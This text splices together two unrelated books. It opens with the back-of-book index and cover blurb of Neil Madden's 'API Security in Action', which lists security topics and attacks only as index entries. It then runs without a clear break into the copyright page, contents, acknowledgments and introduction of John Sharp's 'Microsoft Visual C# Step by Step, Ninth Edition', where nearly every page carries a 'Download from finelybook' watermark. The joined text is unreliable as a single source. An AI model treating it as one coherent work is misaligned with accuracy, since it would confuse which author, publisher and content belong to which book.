runAsNonRoot 346
rwd (read-write-delete) permissions 309
S
salt 75
same-origin policy (SOP) 54, 105–106, 147
SameSite attribute 121
SameSite cookies 127–129, 152
SameSite=lax 129
SameSite=strict 129
sandboxing 347
satisfyExact method 325
Saver API 297
scope claim 254
scope field 242
scope parameter 432, 514
scoped tokens 218–224
adding to Natter 220–222
difference between scopes and
permissions 223–224
scopes 219
Scrypt 72
search method 272
secret key cryptography 195
SecretBox class 198–200, 490
SecretBox.encrypt() method 198
SecretBox.key() method 200
secretName 380
secrets management services 420–422
Secure attribute 121
secure element chip 477
__Secure prefix 123
Secure Production Identity Framework for Every-
one (SPIFFE) 407–408
Secure Socket Layer (SSL) 79
secure() method 81, 350, 392
SecureRandom class 157–158, 160, 180, 236, 329,
350, 443
SecureTokenStore interface 207–209, 323
security areas 8–12
security domain 277
security goals 14–16
Security Information and Event Management
(SIEM) 83
security mechanisms 19–26
access control and authorization 22–23
audit logging 23–24
encryption 20
identification and authentication 21–22
rate-limiting 24–26
security token service (STS) 432
securityContext 346
SecurityParameters class 495
SELECT statement 46
selectFirst method 354
selectors 346
self-contained tokens 181–214
encrypting sensitive attributes 195–205
authenticated encryption 197
authenticated encryption with NaCl 198–200
encrypted JWTs 200–202
using JWT library 203–205
handling token revocation 209–213
JWTs 185–194
generating standard 190–193
JOSE header 188–190
standard claims 187–188
validating signed 193–194
INDEX
550
self-contained tokens (continued)
storing token state on client 182–183
using types for secure API design 206–209
self-signed certificate 80
Sender Context 499
sensitive attributes
encrypting 195–205
authenticated encryption 197
authenticated encryption with NaCl 198–200
encrypted JWTs 200–202
using JWT library 203–205
protecting 177–180
separation of duties 84
Serializable framework 48
serialize() method 191, 203
servers
implementing DTLS 450–452
implementing PSK for 460–461
server-side request forgery (SSRF) attacks 190,
361–365
service accounts
authenticating using JWT bearer grant 395–396
client credentials grant 387–388
service API calls 428–435
OAuth2 token exchange 431–435
phantom token pattern 429–431
service mesh
for TLS 370–374
mutual TLS (mTLS) 406–409
services, Kubernetes 338–339
service-to-service APIs 383–436
API keys and JWT bearer authentication
384–385
JWT bearer grant for OAuth2 389–396
client authentication 391–393
generating JWTs 393–395
service account authentication 395–396
managing service credentials 415–428
avoiding long-lived secrets on disk 423–425
key and secret management services 420–422
key derivation 425–428
Kubernetes secrets 415–420
mutual TLS authentication 396–414
certificate-bound access tokens 410–414
client certificate authentication 399–401
how TLS certificate authentication
works 397–398
mutual TLS with OAuth2 409–410
using service mesh 406–409
verifying client identity 402–406
OAuth2 client credentials grant 385–388
service API calls in response to user
requests 428–435
OAuth2 token exchange 431–435
phantom token pattern 429–431
session cookie authentication 101–145
building Natter login UI 138–142
implementing logout 143–145
in web browsers 102–108
calling Natter API from JavaScript 102–104
drawbacks of HTTP authentication 108
intercepting form submission 104
serving HTML from same origin 105–108
preventing Cross-Site Request Forgery
attacks 125–138
double-submit cookies for Natter API
133–138
hash-based double-submit cookies 129–133
SameSite cookies 127–129
session cookies 115–125
avoiding session fixation attacks 119–120
cookie security attributes 121–123
validating 123–125
token-based authentication 109–115
implementing token-based login 112–115
token store abstraction 111–112
session cookies 115–125
avoiding session fixation attacks 119–120
cookie security attributes 121–123
validating 123–125
session fixation attacks 119–120
session.fireAllRules() method 286
session.invalidate() method 143
sessionStorage object 164
Set-Cookie header 115
setItem(key, value) method 165
setSSLParameters() method 456
setUseClientMode(true) method 444
SHA-256 hash function 133
sha256() method 171
side channels 477
sidecar container 338
SIEM (Security Information and Event
Management) 83
signature algorithms 254–256
Signature object 421
SignedJwtAccessToken 265
SignedJwtAccessTokenStore 252
SignedJwtTokenStore 192, 208
single logout 260
single sign-on (SSO) 258–259
single-page apps (SPAs) 54, 312
site-local IPv6 addresses 363
SIV (Synthetic Initialization Vector) mode 475
SIV-AES 475
slow_down 516
smart TVs 512
SOP (same-origin policy) 54, 105–106, 147
SpaceController class 34, 36–37, 75, 94, 278, 304
spaceId 41
INDEX
551
space_id field 277
:spaceId parameter 92
spaces 34–35
spaces database 35
spaces table 32, 90
Spark route 36
Spark.exception() method 51
SPAs (single-page apps) 54, 312
SPIFFE (Secure Production Identity Framework
for Everyone) 407–408
sponge construction 473
spoofing prevention 70–77
authenticating users 75–77
creating password database 72–74
HTTP Basic authentication 71
registering users in Natter API 74–75
secure password storage with Scrypt 72
SQLi (SQL injection) attacks 40, 45–47, 270
src attribute 167
SSL (Secure Socket Layer) 79
SSL offloading 10
SSL passthrough 379
SSL re-encryption 10
SSL termination 10
ssl-client-cert header 400, 402, 404, 413
ssl-client-issuer-dn header 402
ssl-client-subject-dn header 402
ssl-client-verify header 402, 404, 413
SSLContext 444, 450
SSLContext.init() method 443
SSLEngine class 443–444, 456–457, 461
sslEngine.beginHandshake() method 446
sslEngine.getHandshakeStatus() method 446
SSLEngine.unwrap() method 447
sslEngine.unwrap(recvBuf, appData) 446
sslEngine.wrap(appData, sendBuf) 445
SSLParameters 456
SSLSocket class 443–444
SSO (single sign-on) 258–259
SSRF (server-side request forgery) attacks 190,
361–365
state parameter 232, 263
stateless interactions 115
static groups 272
static roles 277–278
staticFiles directive 106
sticky load balancing 505–506
Storage interface 165
strict transport security 82
STRIDE (spoofing, tampering, repudiation, infor-
mation disclosure, denial of service, elevation
of privilege) 18
String equals method 134
STROBE framework 473
STS (security token service) 432
styles, API security 7–8
sub claim 187, 191, 393, 395
sub field 242
sub-domain hijacking 122
sub-domain takeover 122
subject attribute 123, 282
Subject field 407
subject_token_type parameter 432
.svc.cluster.local filter 367
Synthetic Initialization Vector (SIV) mode 475
System.getenv(String name) method 417
T
tampering 18
tap utility 373
targetPort attribute 348
TCP (Transmission Control Protocol) 441
TEE (Trusted Execution Environment) 482
temporary tables 270
test client 388
third-party caveats 328–330
answers to exercises 330
creating 329–330
third-party clients 111
threat models 16–18
threats 17, 63–64
throttling 24–25
thumbprint method 411
timeOfDay attribute 288
TimestampCaveatVerifier 325
timing attacks 134
TLS (Transport Layer Security) 9, 79, 440–457
authenticating devices with 492–496
cipher suites for constrained devices 452–457
Datagram TLS (DTLS) 441–452
implementing for client 443–450
implementing for server 450–452
mutual TLS (mTLS) authentication 396–414
certificate-bound access tokens 410–414
client certificate authentication 399–401
using service mesh 406–409
verifying client identity 402–406
with OAuth2 409–410
securing communications with 368–369
using service mesh for 370–374
TLS cipher suite 245
TLS secret 416
TlsContext class 495
TLS_DHE_PSK_WITH_AES_128_CCM cipher
suite 466
TLS_DHE_PSK_WITH_AES_256_CCM cipher
suite 466
TLS_DHE_PSK_WITH_CHACHA20_POLY1305_
SHA256 cipher suite 466
INDEX
552
TLS_ECDHE_PSK_WITH_AES_128_CCM_
SHA256 cipher suite 466
TLS_ECDHE_PSK_WITH_CHACHA20_
POLY1305_SHA256 cipher suite 466
TLS_EMPTY_RENEGOTIATION_INFO_SCSV
marker cipher suite 456
TlsPSKIdentityManager 460
TLS_PSK_WITH_AES_128_CCM cipher suite 464
TLS_PSK_WITH_AES_128_CCM_8 cipher
suite 464
TLS_PSK_WITH_AES_128_GCM_SHA256 cipher
suite 464
TLS_PSK_WITH_AES_256_CCM cipher suite 464
TLS_PSK_WITH_AES_256_CCM_8 cipher
suite 464
TLS_PSK_WITH_AES_256_GCM_SHA384 cipher
suite 464
TLS_PSK_WITH_CHACHA20_POLY1305_
SHA256 cipher suite 464
Token class 111–112
Token endpoint 529
token exchange 431–435
token introspection 239–244
Token object 117
token parameter 241
token revocation 143
token store abstraction 111–112
token-based authentication 109–115
implementing token-based login 112–115
modern 146–180
allowing cross-domain requests with
CORS 147–154
hardening database token storage 170–180
tokens without cookies 154–169
token store abstraction 111–112
TokenController class 177, 194, 200, 209, 315
TokenController interface 113–115, 118, 136
TokenController validateToken() method 124
tokenController.requireScope method 222
TokenController.validateToken method 317
tokenId argument 124, 134
tokenId parameter 136
tokens 102
access tokens 239–258
ID tokens 260–262, 264–266
macaroons 319–330
contextual caveats 321
first-party caveats 325–328
macaroon token store 322–324
third-party caveats 328–330
refresh tokens 237–238
scoped tokens 218–224
adding to Natter 220–222
difference between scopes and
permissions 223–224
self-contained tokens 181–214
encrypting sensitive attributes 195–205
handling token revocation 209–213
JWTs 185–194
storing token state on client 182–183
using types for secure API design 206–209
without cookies 154–169
Bearer authentication scheme 160–162
deleting expired tokens 162–163
storing token state in database 155–160
storing tokens in Web Storage 163–166
updating CORS filter 166
XSS attacks on Web Storage 167–169
tokens table 158, 305
TokenStore interface 111–113, 115, 118, 124,
143–144, 207–208, 243, 303, 322
tokenStore variable 315
token_type_hint parameter 241
toPublicJWKSet method 392
Transmission Control Protocol (TCP) 441
trust boundaries 17
Trusted Execution Environment (TEE) 482
Trusted Types 169
TrustManager array 443, 450
TrustManagerFactory 443
tryAcquire() method 67
two-factor authentication (2FA) 22
U
UDP (User Datagram Protocol) 65, 442
UDPTransport 461
UIDs (user IDs) 343, 350
UMA (User Managed Access) 224
unacceptable inputs 50
uniqueMember attribute 272
Universal Links 235
UNPROTECTED header 471
unwrap() method 447–448, 450–451
update() method 426
updateUnique method 44
URI field 407
uri.toASCIIString() method 305
URL class 312
user codes 513
User Datagram Protocol (UDP) 65, 442
user IDs (UIDs) 343, 350
User Managed Access (UMA) 224
user namespace 343
user requests 428–435
OAuth2 token exchange 431–435
phantom token pattern 429–431
UserController class 74, 76, 91, 113, 269, 404, 413
UserController.lookupPermissions method 306
user_id column 305
INDEX
553
user_id field 277
UserInfo endpoint 260, 529
username attribute 316
username field 242
user_roles table 277–279, 305
users 268–273
adding new to Natter space 94–95
authenticating 75–77
determining user roles 279–280
Lightweight Directory Access Protocol (LDAP)
groups 271–273
registering 74–75
users table 90, 269
V
validateToken method 123, 137
validation
capabilities 306–307
session cookies 123–125
signed JWTs 193–194
VARCHAR 491
verification URI 513
verification_uri_complete field 515
version control capabilities 23
virtual machines (VMs) 337
virtual private cloud (VPC) 423
virtual static groups 272
VirtualBox
Linux 534
MacOS 532–533
Windows 534
VMs (virtual machines) 337
volumeMounts section 417
VPC (virtual private cloud) 423
W
WAF (web application firewall) 10
web browsers, session cookie authentication
in 102–108
calling Natter API from JavaScript 102–104
drawbacks of HTTP authentication 108
intercepting form submission 104
serving HTML from same origin 105–108
Web Ontology Language (OWL) 281
Web Storage
storing tokens in 163–166
XSS attacks on 167–169
WebAuthn 397
web-keys 312
wikis 23
window object 104
window.location.hash variable 312
window.referrer field 312
window.referrer variable 301–302
Windows
setting up Java and Maven on 525
setting up Kubernetes 534
Minikube 534
VirtualBox 534
wrap() method 447–449, 451
WWW-Authenticate challenge header
161
WWW-Authenticate header 89
X
x5c claim 409
x5c header 251
XACML (eXtensible Access-Control Markup
Language) 290–291
X-Content-Type-Options header 57
X-CSRF-Token header 130, 136, 142, 160, 163,
166
X-Forwarded-Client-Cert header 407–408
X-Frame-Options header 57
XMLHttpRequest object 102
XOR operator 135
xor() method 504
XSS (cross-site scripting) attacks 54, 56,
168
exploiting 54–57
on Web Storage 167–169
preventing 57–58
X-XSS-Protection header 57
Z
zero trust networking 362
API security
Authorization
Audit logging
Authentication
Encryption
Rate-limiting
Passwords
Token-based
Cookies
Macaroons
JWTs
Certificates
End-to-end
Identity-based
ACLs
Roles
ABAC
Capabilities
OAuth2
Confused deputy attacks
CSRF
Dictionary
attacks
Token theft
Denial of
service
Session
fixation
Replay
attacks
Open
redirects
Privilege escalation
Algorithm
mixup
Log
forgery
Malleability
SQL injection
SSRF
Attacks covered
XSS
Attack
SQL injection
Cross-site scripting (XSS)
Denial of service (DoS)
Dictionary attacks
Privilege escalation
Session fixation
Cross-site request forgery (CSRF)
Token theft
JWT algorithm mixup
Malleability
Attack
Auth code injection
Confused deputy attacks
Open redirects
Server-side request forgery (SSRF)
Log forgery
Replay attacks
Auth code
injection
Chapter
5
6
6
7
9
10
10
13
4
4
3
3
3
3
2
2
Chapter
Neil Madden
ISBN: 978-1-61729-602-4
A
PIs control data sharing in every service, server, data store,
and web client. Modern data-centric designs—including
microservices and cloud-native applications—demand a
comprehensive, multi-layered approach to security for both
private and public-facing APIs.
API Security in Action teaches you how to create secure APIs
for any situation. By following this hands-on guide you’ll
build a social network API while mastering techniques for
fl exible multi-user security, cloud key management, and
lightweight cryptography. When you’re done, you’ll be able
to create APIs that stand up to complex threat models and
hostile environments.
What’s Inside
● Authentication
● Authorization
● Audit logging
● Rate limiting
● Encryption
For developers with experience building RESTful APIs.
Examples are in Java.
Neil Madden has in-depth knowledge of applied cryptography,
application security, and current API security technologies. He
holds a Ph.D. in Computer Science.
To download their free eBook in PDF, ePub, and Kindle formats,
owners of this book should visit
www.manning.com/books/api-security-in-action
$69.99 / Can $92.99 [INCLUDING eBOOK]
API Security IN ACTION
SOFTWARE DEVELOPMENT/SECURITY
M A N N I N G
“
A comprehensive guide to
designing and implementing
secure services. A must-read
book for all API practitioners
who manage security.”
—Gilberto Taccari, Penta
“
Anyone who wants an
in-depth understanding of API
security should read this.”
—Bobby Lin, DBS Bank
“
I highly recommend
this book to those
developing APIs.”
—Jorge Bo, Naranja X
“
The best comprehensive
guide about API security
I have read.”
—Marc Roulleau, GIRO
See first page | pdf |
Download from finelybook [email protected]
2
Microsoft Visual C# Step by Step
Ninth Edition
John Sharp
Download from finelybook [email protected]
3
Microsoft Visual C# Step by Step, Ninth Edition
Published with the authorization of Microsoft Corporation by: Pearson
Education, Inc.
Copyright © 2018 by Pearson Education, Inc.
All rights reserved. This publication is protected by copyright, and
permission must be obtained from the publisher prior to any prohibited
reproduction, storage in a retrieval system, or transmission in any form or by
any means, electronic, mechanical, photocopying, recording, or likewise. For
information regarding permissions, request forms, and the appropriate
contacts within the Pearson Education Global Rights & Permissions
Department, please visit www.pearsoned.com/permissions/. No patent
liability is assumed with respect to the use of the information contained
herein. Although every precaution has been taken in the preparation of this
book, the publisher and author assume no responsibility for errors or
omissions. Nor is any liability assumed for damages resulting from the use of
the information contained herein.
ISBN-13: 978-1-5093-0776-0
ISBN-10: 1-5093-0776-1
Library of Congress Control Number: 2018944197
1 18
Trademarks
Microsoft and the trademarks listed at http://www.microsoft.com on the
“Trademarks” webpage are trademarks of the Microsoft group of companies.
All other marks are property of their respective owners.
Warning and Disclaimer
Every effort has been made to make this book as complete and as accurate as
possible, but no warranty or fitness is implied. The information provided is
on an “as is” basis. The author, the publisher, and Microsoft Corporation
Download from finelybook [email protected]
4
shall have neither liability nor responsibility to any person or entity with
respect to any loss or damages arising from the information contained in this
book.
Special Sales
For information about buying this title in bulk quantities, or for special sales
opportunities (which may include electronic versions; custom cover designs;
and content particular to your business, training goals, marketing focus, or
branding interests), please contact our corporate sales department at
[email protected] or (800) 382-3419.
For government sales inquiries, please contact
[email protected].
For questions about sales outside the U.S., please contact
[email protected].
Editor-in-Chief
Brett Bartow
Acquisitions Editor
Trina MacDonald
Development Editor
Rick Kughen
Managing Editor
Sandra Schroeder
Senior Project Editor
Tracey Croom
Copy Editor
Christopher Morris
Indexer
Erika Millen
Proofreader
Download from finelybook [email protected]
5
Jeanine Furino
Technical Editor
David Franson
Editorial Assistant
Courtney Martin
Cover Designer
Twist Creative, Seattle
Compositor
codemantra
Download from finelybook [email protected]
6
Contents at a Glance
Acknowledgments
About the Author
Introduction
PART I INTRODUCING MICROSOFT VISUAL C# AND
MICROSOFT VISUAL STUDIO 2017
CHAPTER 1 Welcome to C#
CHAPTER 2 Working with variables, operators, and expressions
CHAPTER 3 Writing methods and applying scope
CHAPTER 4 Using decision statements
CHAPTER 5 Using compound assignment and iteration statements
CHAPTER 6 Managing errors and exceptions
PART II UNDERSTANDING THE C# OBJECT MODEL
CHAPTER 7 Creating and managing classes and objects
CHAPTER 8 Understanding values and references
CHAPTER 9 Creating value types with enumerations and structures
CHAPTER 10 Using arrays
CHAPTER 11 Understanding parameter arrays
CHAPTER 12 Working with inheritance
CHAPTER 13 Creating interfaces and defining abstract classes
CHAPTER 14 Using garbage collection and resource management
PART III DEFINING EXTENSIBLE TYPES WITH C#
Download from finelybook [email protected]
7
CHAPTER 15 Implementing properties to access fields
CHAPTER 16 Handling binary data and using indexers
CHAPTER 17 Introducing generics
CHAPTER 18 Using collections
CHAPTER 19 Enumerating collections
CHAPTER 20 Decoupling application logic and handling events
CHAPTER 21 Querying in-memory data by using query expressions
CHAPTER 22 Operator overloading
PART IV BUILDING UNIVERSAL WINDOWS PLATFORM
APPLICATIONS WITH C#
CHAPTER 23 Improving throughput by using tasks
CHAPTER 24 Improving response time by performing asynchronous
operations
CHAPTER 25 Implementing the user interface for a Universal Windows
Platform app
CHAPTER 26 Displaying and searching for data in a Universal Windows
Platform app
CHAPTER 27 Accessing a remote database from a Universal Windows
Platform app
Index
Download from finelybook [email protected]
8
Contents
Acknowledgments
About the Author
Introduction
PART I INTRODUCING MICROSOFT VISUAL C# AND
MICROSOFT VISUAL STUDIO 2017
Chapter 1 Welcome to C#
Beginning programming with the Visual Studio 2017
environment
Writing your first program
Using namespaces
Creating a graphical application
Examining the Universal Windows Platform app
Adding code to the graphical application
Summary
Quick reference
Chapter 2 Working with variables, operators, and expressions
Understanding statements
Using identifiers
Identifying keywords
Using variables
Naming variables
Declaring variables
Specifying numeric values
Download from finelybook [email protected]
9
Working with primitive data types
Unassigned local variables
Displaying primitive data type values
Using arithmetic operators
Operators and types
Examining arithmetic operators
Controlling precedence
Using associativity to evaluate expressions
Associativity and the assignment operator
Incrementing and decrementing variables
Prefix and postfix
Declaring implicitly typed local variables
Summary
Quick reference
Chapter 3 Writing methods and applying scope
Creating methods
Declaring a method
Returning data from a method
Using expression-bodied methods
Calling methods
Specifying the method call syntax
Returning multiple values from a method
Applying scope
Defining local scope
Defining class scope
Overloading methods
Writing methods
Refactoring code
Nesting methods
Download from finelybook [email protected]
10
Using optional parameters and named arguments
Defining optional parameters
Passing named arguments
Resolving ambiguities with optional parameters and
named arguments
Summary
Quick reference
Chapter 4 Using decision statements
Declaring Boolean variables
Using Boolean operators
Understanding equality and relational operators
Understanding conditional logical operators
Short-circuiting
Summarizing operator precedence and associativity
Using if statements to make decisions
Understanding if statement syntax
Using blocks to group statements
Cascading if statements
Using switch statements
Understanding switch statement syntax
Following the switch statement rules
Summary
Quick reference
Chapter 5 Using compound assignment and iteration statements
Using compound assignment operators
Writing while statements
Writing for statements
Understanding for statement scope
Writing do statements
Download from finelybook [email protected]
11
Summary
Quick reference
Chapter 6 Managing errors and exceptions
Coping with errors
Trying code and catching exceptions
Unhandled exceptions
Using multiple catch handlers
Catching multiple exceptions
Filtering exceptions
Propagating exceptions
Using checked and unchecked integer arithmetic
Writing checked statements
Writing checked expressions
Throwing exceptions
Using throw exceptions
Using a finally block
Summary
Quick reference
PART II UNDERSTANDING THE C# OBJECT MODEL
Chapter 7 Creating and managing classes and objects
Understanding classification
The purpose of encapsulation
Defining and using a class
Controlling accessibility
Working with constructors
Overloading constructors
Deconstructing an object
Understanding static methods and data
Download from finelybook [email protected]
12
Creating a shared field
Creating a static field by using the const keyword
Understanding static classes
Static using statements
Anonymous classes
Summary
Quick reference
Chapter 8 Understanding values and references
Copying value type variables and classes
Understanding null values and nullable types
The null-conditional operator
Using nullable types
Understanding the properties of nullable types
Using ref and out parameters
Creating ref parameters
Creating out parameters
How computer memory is organized
Using the stack and the heap
The System.Object class
Boxing
Unboxing
Casting data safely
The is operator
The as operator
The switch statement revisited
Summary
Quick reference
Chapter 9 Creating value types with enumerations and structures
Working with enumerations
Download from finelybook [email protected]
13
Declaring an enumeration
Using an enumeration
Choosing enumeration literal values
Choosing an enumeration’s underlying type
Working with structures
Declaring a structure
Understanding differences between structures and classes
Declaring structure variables
Understanding structure initialization
Copying structure variables
Summary
Quick reference
Chapter 10 Using arrays
Declaring and creating an array
Declaring array variables
Creating an array instance
Populating and using an array
Creating an implicitly typed array
Accessing an individual array element
Iterating through an array
Passing arrays as parameters and return values for a
method
Copying arrays
Using multidimensional arrays
Creating jagged arrays
Accessing arrays that contain value types
Summary
Quick reference
Chapter 11 Understanding parameter arrays
Download from finelybook [email protected]
14
Overloading—a recap
Using array arguments
Declaring a params array
Using params object[ ]
Using a params array
Comparing parameter arrays and optional parameters
Summary
Quick reference
Chapter 12 Working with inheritance
What is inheritance?
Using inheritance
The System.Object class revisited
Calling base-class constructors
Assigning classes
Declaring new methods
Declaring virtual methods
Declaring override methods
Understanding protected access
Creating extension methods
Summary
Quick reference
Chapter 13 Creating interfaces and defining abstract classes
Understanding interfaces
Defining an interface
Implementing an interface
Referencing a class through its interface
Working with multiple interfaces
Explicitly implementing an interface
Interface restrictions
Download from finelybook [email protected]
15
Defining and using interfaces
Abstract classes
Abstract methods
Sealed classes
Sealed methods
Implementing and using an abstract class
Summary
Quick reference
Chapter 14 Using garbage collection and resource management
The life and times of an object
Writing destructors
Why use the garbage collector?
How does the garbage collector work?
Recommendations
Resource management
Disposal methods
Exception-safe disposal
The using statement and the IDisposable interface
Calling the Dispose method from a destructor
Implementing exception-safe disposal
Summary
Quick reference
PART III DEFINING EXTENSIBLE TYPES WITH C#
Chapter 15 Implementing properties to access fields
Implementing encapsulation by using methods
What are properties?
Using properties
Download from finelybook [email protected]
16
Read-only properties
Write-only properties
Property accessibility
Understanding the property restrictions
Declaring interface properties
Replacing methods with properties
Generating automatic properties
Initializing objects by using properties
Summary
Quick reference
Chapter 16 Handling binary data and using indexers
What is an indexer?
Storing binary values
Displaying binary values
Manipulating binary values
Solving the same problems using indexers
Understanding indexer accessors
Comparing indexers and arrays
Indexers in interfaces
Using indexers in a Windows application
Summary
Quick reference
Chapter 17 Introducing generics
The problem: Misusing with the object type
The generics solution
Generics vs. generalized classes
Generics and constraints
Creating a generic class
The theory of binary trees
Download from finelybook [email protected]
17
Building a binary tree class by using generics
Creating a generic method
Defining a generic method to build a binary tree
Variance and generic interfaces
Covariant interfaces
Contravariant interfaces
Summary
Quick reference
Chapter 18 Using collections
What are collection classes?
The List<T> collection class
The LinkedList<T> collection class
The Queue<T> collection class
The Stack<T> collection class
The Dictionary<TKey, TValue> collection class
The SortedList<TKey, TValue> collection class
The HashSet<T> collection class
Using collection initializers
The Find methods, predicates, and lambda expressions
The forms of lambda expressions
Comparing arrays and collections
Using collection classes to play cards
Summary
Quick reference
Chapter 19 Enumerating collections
Enumerating the elements in a collection
Manually implementing an enumerator
Implementing the IEnumerable interface
Download from finelybook [email protected]
18
Implementing an enumerator by using an iterator
A simple iterator
Defining an enumerator for the Tree<TItem> class by
using an iterator
Summary
Quick reference
Chapter 20 Decoupling application logic and handling events
Understanding delegates
Examples of delegates in the .NET Framework class
library
The automated factory scenario
Implementing the factory control system without using
delegates
Implementing the factory by using a delegate
Declaring and using delegates
Lambda expressions and delegates
Creating a method adapter
Enabling notifications by using events
Declaring an event
Subscribing to an event
Unsubscribing from an event
Raising an event
Understanding user interface events
Using events
Summary
Quick reference
Chapter 21 Querying in-memory data by using query expressions
What is LINQ?
Using LINQ in a C# application
Download from finelybook [email protected]
19
Selecting data
Filtering data
Ordering, grouping, and aggregating data
Joining data
Using query operators
Querying data in Tree<TItem> objects
LINQ and deferred evaluation
Summary
Quick reference
Chapter 22 Operator overloading
Understanding operators
Operator constraints
Overloaded operators
Creating symmetric operators
Understanding compound assignment evaluation
Declaring increment and decrement operators
Comparing operators in structures and classes
Defining operator pairs
Implementing operators
Understanding conversion operators
Providing built-in conversions
Implementing user-defined conversion operators
Creating symmetric operators, revisited
Writing conversion operators
Summary
Quick reference
PART IV BUILDING UNIVERSAL WINDOWS PLATFORM
APPLICATIONS WITH C#
Download from finelybook [email protected]
20
Chapter 23 Improving throughput by using tasks
Why perform multitasking by using parallel processing?
The rise of the multicore processor
Implementing multitasking by using the Microsoft .NET
Framework
Tasks, threads, and the ThreadPool
Creating, running, and controlling tasks
Using the Task class to implement parallelism
Abstracting tasks by using the Parallel class
When not to use the Parallel class
Canceling tasks and handling exceptions
The mechanics of cooperative cancellation
Using continuations with canceled and faulted tasks
Summary
Quick reference
Chapter 24 Improving response time by performing asynchronous
operations
Implementing asynchronous methods
Defining asynchronous methods: The problem
Defining asynchronous methods: The solution
Defining asynchronous methods that return values
Asynchronous method gotchas
Asynchronous methods and the Windows Runtime APIs
Tasks, memory allocation, and efficiency
Using PLINQ to parallelize declarative data access
Using PLINQ to improve performance while iterating
through a collection
Canceling a PLINQ query
Synchronizing concurrent access to data
Locking data
Download from finelybook [email protected]
21
Synchronization primitives for coordinating tasks
Canceling synchronization
The concurrent collection classes
Using a concurrent collection and a lock to implement
thread-safe data access
Summary
Quick reference
Chapter 25 Implementing the user interface for a Universal Windows
Platform app
Features of a Universal Windows Platform app
Using the Blank App template to build a Universal Windows
Platform app
Implementing a scalable user interface
Applying styles to a UI
Summary
Quick reference
Chapter 26 Displaying and searching for data in a Universal Windows
Platform app
Implementing the Model–View–ViewModel pattern
Displaying data by using data binding
Modifying data by using data binding
Using data binding with a ComboBox control
Creating a ViewModel
Adding commands to a ViewModel
Searching for data using Cortana
Providing a vocal response to voice commands
Summary
Quick reference
Chapter 27 Accessing a remote database from a Universal Windows
Download from finelybook [email protected]
22
Platform app
Retrieving data from a database
Creating an entity model
Creating and using a REST web service
Inserting, updating, and deleting data through a REST web
service
Reporting errors and updating the UI
Summary
Quick reference
Index
Download from finelybook [email protected]
23
Acknowledgments
Well, here we are again, in what appears to have become a biennial event;
such is the pace of change in the world of software development! As I glance
at my beloved first edition of Kernighan and Ritchie describing The C
Programming Language (Prentice Hall), I occasionally get nostalgic for the
old times. In those halcyon days, programming had a certain mystique, even
glamour. Nowadays, in one form or another, the ability to write at least a
little bit of code is fast becoming as much a requirement in many workplaces
as the ability to read, write, or add up. The romance has gone, to be replaced
by an air of “everyday-ness.” Then, as I start to hanker after the time when I
still had hair on my head and the corporate mainframe required a team of full-
time support staff just to pander to its whims, I realize that if programming
were restricted to a few elite souls, then the market for C# books would have
disappeared after the first couple of editions of this tome. Thus cheered, I
power up my laptop, my mind mocking the bygone era when such processing
power could have navigated many hundreds of Apollo spacecraft
simultaneously to the moon and back, and get down to work on the latest
edition of this book!
Despite the fact that my name is on the cover, authoring a book such as
this is far from a one-man project. I’d like to thank the following people who
have provided unstinting support and assistance throughout this exercise.
First, Trina MacDonald at Person Education, who took on the role of
prodding me into action and ever-so-gently tying me down to well-defined
deliverables and hand-off dates. Without her initial impetus and cajoling, this
project would not have got off the ground.
Next, Rick Kughen, the tireless copy editor who ensured that my grammar
remained at least semi-understandable, and picked up on the missing words
and nonsense phrases in the text.
Download from finelybook [email protected]
24
Then, David Franson, who had the unenviable task of testing the code and
exercises. I know from experience that this can be a thankless and frustrating
task at times, but the hours spent and the feedback that results can only make
for a better book. Of course, any errors that remain are entirely my
responsibility, and I am happy to listen to feedback from any reader.
As ever, I must also thank Diana, my better half, who keeps me supplied
with caffeine-laden hot drinks when deadlines are running tight. Diana has
been long-suffering and patient, and has so far survived my struggle through
nine editions of this book; that is dedication well beyond the call of duty. She
has recently taken up running. I assumed it was to keep fit, but I think it is
more likely so she can get well away from the house and scream loudly
without my hearing her!
And lastly, to James and Frankie, who have both now flown the nest.
James is trying to avoid gaining a Yorkshire accent while living and working
in Sheffield, but Frankie has remained closer to home so she can pop in and
raid the kitchen from time to time.
Download from finelybook [email protected]
25
About the Author
John Sharp is a principal technologist for CM Group Ltd, a software
development and consultancy company in the United Kingdom. He is well
versed as a software consultant, developer, author, and trainer, with more
than 35 years of experience, ranging from Pascal programming on CP/M and
C/Oracle application development on various flavors of UNIX to the design
of C# and JavaScript distributed applications and development on Windows
10 and Microsoft Azure. He also spends much of his time writing courseware
for Microsoft, focusing on areas such as Data Science using R and Python,
Big Data processing with Spark and CosmosDB, and scalable application
architecture with Azure.
Download from finelybook [email protected]
26
Introduction
Microsoft Visual C# is a powerful but simple language aimed primarily at
developers who create applications built on the Microsoft .NET Framework.
Visual C# inherits many of the best features of C++ and Microsoft Visual
Basic but few of the inconsistencies and anachronisms, which results in a
cleaner and more logical language.
C# 1.0 made its public debut in 2001.
C# 2.0, with Visual Studio 2005, provided several important new
features, including generics, iterators, and anonymous methods.
C# 3.0, which was released with Visual Studio 2008, added extension
methods, lambda expressions, and most famously of all, the Language-
Integrated Query facility, or LINQ.
C# 4.0 was released in 2010 and provided further enhancements that
improved its interoperability with other languages and technologies.
These features included support for named and optional arguments and
the dynamic type, which indicates that the language runtime should
implement late binding for an object. An important addition to the
.NET Framework, and released concurrently with C# 4.0, were the
classes and types that constitute the Task Parallel Library (TPL). Using
the TPL, you can build highly scalable applications that can take full
advantage of multicore processors.
C# 5.0 added native support for asynchronous task-based processing
through the async method modifier and the await operator.
C# 6.0 was an incremental upgrade with features designed to make life
simpler for developers. These features include items such as string
interpolation (you need never use String.Format again!), enhancements
to the ways in which properties are implemented, expression-bodied
methods, and others.
Download from finelybook [email protected]
27
C# 7.0 adds further enhancements to aid productivity and remove some
of the minor anachronisms of C#. For example, you can now
implement property accessors as expression-bodied members, methods
can return multiple values in the form of tuples, the use of out
parameters has been simplified, and switch statements have been
extended to support pattern- and type-matching. There are other
updates as well, which are covered in this book.
It goes without saying that Microsoft Windows 10 is an important
platform for running C# applications, but now you can also run code
developed by using C# on other operating systems, such as Linux, through
the .NET Core runtime. This opens up possibilities for writing code that can
run in multiple environments. Additionally, Windows 10 supports highly
interactive applications that can share data and collaborate as well as connect
to services running in the cloud. The key notion in Windows 10 is Universal
Windows Platform (UWP) apps—applications designed to run on any
Windows 10 device, whether a fully fledged desktop system, a laptop, a
tablet, or even an IoT (Internet of Things) device with limited resources.
Once you have mastered the core features of C#, gaining the skills to build
applications that can run on all these platforms is important.
Voice activation is another feature that has come to the fore, and Windows
10 includes Cortana, your personal voice-activated digital assistant. You can
integrate your own apps with Cortana to allow them to participate in data
searches and other operations. Despite the complexity normally associated
